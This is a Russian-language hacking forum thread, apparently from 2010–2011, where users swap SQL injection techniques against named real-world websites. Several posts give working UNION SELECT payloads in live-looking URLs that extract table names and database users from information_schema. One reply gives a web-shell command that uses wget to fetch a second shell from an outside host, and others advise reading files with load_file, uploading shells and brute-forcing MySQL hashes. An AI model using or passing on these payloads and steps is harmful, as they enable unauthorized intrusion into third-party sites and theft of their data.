Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    facepalm !!!, испортил настроение ...читай школоло мануалы..не забудь остановится в разделе про LIMIT ...откуда вы беретесь...иди лучше уроки готовь и пиши сочинение "как я провел новогодние каникулы"
     
    2 people like this.
  2. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    qaz
    Как бы воут,почитай факи.
    http://www.feb.spb.ru/news.php?id=100+union+select+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables--+
     
  3. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    Если кому не трудно - поясните мне такую ситуацию
    Там вроде файлы показываются, но вроде бы не все из того что показывается - имена файлов, так вот, хотелось бы чтоб, кто нить умный разжевал, почему это случилось, что это и с чем это едят, за ранее благодарю ))
     
  4. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    не понял о чем ты, но там блайнд иньекция
     
    _________________________
    2 people like this.
  5. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    потому что

    includer.php
     
    1 person likes this.
  6. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    снанил сайты и попался такой:
    http://www.sonicscience.com/store/index.php?id=0+uNioN+alL+sEleCT+1--
    можете сказать что тут "уязвиного" ? как то я ничего не видел там.. но прога выдает, как уязвимым.
     
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    B1t.exe

    там ничего нет.

    и давайте не будем обсуждать <программы> подобного рода, и будем больше использовать свои знания.
     
    _________________________
    2 people like this.
  8. Aels

    Aels New Member

    Joined:
    29 Jun 2010
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Доброго. объясните темному пожалуйста, куда копать в таком случае:
    https://secure.webblake.com/ShoppingCart569.php?k=query_here
    [​IMG]
    не выводит ошибки вовсе. только саму квери если битая.
    в тоже время параметр учавствует в 2х запросах, и вывести его, чтобы не вызывало ошибки - не могу.
     
  9. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    http://www.mibf.ru/index.php?id=-1+union+select+null,null,null,null,null,null,null,user(),null,null--+
    И в адресной строке ты увидешь:
    http://www.mibf.ru/mibf@localhost
    Ну ты понел...
     
    1 person likes this.
  10. docw_p

    docw_p Banned

    Joined:
    31 Dec 2010
    Messages:
    1
    Likes Received:
    1
    Reputations:
    0
    naprimer vot tak :

     
    1 person likes this.
  11. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    привет залил команду через бд, получился файл shell.php
    подскажите как пользоваться ею чтобы залить полноценный веб шелл? адрес вебшелла есть
    xxx.narod.ru/1.php
     
  12. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,183
    Likes Received:
    618
    Reputations:
    690
    прочитай про wget или fetch )
     
    _________________________
  13. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    http://site.ru/shell.php?cmd=wget http://xxx.narod.ru/1.php
     
  14. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    Раз у тебя столько баз,значит и mysql скорее всего тоже доступна.
    Значит пробуй лоад_файл,ищи пути,когда найдешь проверяй файл_прив и если все ок то лей шелл.Если не вышло,попробуй найти пыхпмайадмин,сбрутив хеши майскул юзверов.
     
  15. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    docw_p
    Так не получится, так как столбцы имеют вид, который был предоставлен Nightmarе.

    Nightmarе
    В таких случаях можно сделать примерно так
    Code:
    select distinct(table_name) from information_schema.columns where column_name like '%user%'
    Где символ "%" справа и слева означает, что слово "user" может быть и в начале, и в середине и в конце колонки.

    Но я бы искал не по слову "user", если тебя интересуют все пользователи, а не только форума, а по паролю запросом вида:
    Code:
    select distinct(table_name) from information_schema.columns where column_name like '%pass%'
     
    1 person likes this.
  16. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    я бы сделал вот так, если по каким то конкретным именам таблиц:
    SELECT group_concat(table_schema) from information_schema.tables where table_name=0x...

    либо если не слеширует то через Like
     
  17. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    -1'+union+select+group_concat(table_schema,0x2d,table_name,0x2d,column_name),2+from+information_schema.columns+where+table_name+like+'%user%'+or+column_name+like+'%user%'--+
     
  18. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,027
    Likes Received:
    311
    Reputations:
    86
    Я часто делаю так: заменяю все цифры на user(), затем открываю исходник и ищу по символу @. М.б. ламерский способ, но меня выручал всегда.
    Кста, в твоем примере там ты указываешь null, а надо цифры.
    Скорей всего, у тебя есть доступ к базам (обычно можно получить только имена) других сайтов на этом серваке.
     
    _________________________
    #15778 fl00der, 2 Jan 2011
    Last edited: 2 Jan 2011
  19. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.elephant.se/location2.php?location_id=513'+union+select+1,2,3,table_name,5,6,7,8,9,10++from+information_schema.tables--+
    иди млять и читай мануалы по скулям, сколько можно постить бред..и спрашивать то что уже миллион раз в данной теме перемалывали...стандартная скуля...нормально составь запрос...
     
    2 people like this.
  20. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Зашёл в тупик: есть слепая инъекция. Не могу понять, то ли фильтруется from, то ли нет доступа к information_schema. Как определить?

    первый способ это просто брутить таблицы в данной базе чтобы определить работает ли from, но этот метод далеко неэфективен причины думаю ясны.

    Какие есть идеи
     
Thread Status:
Not open for further replies.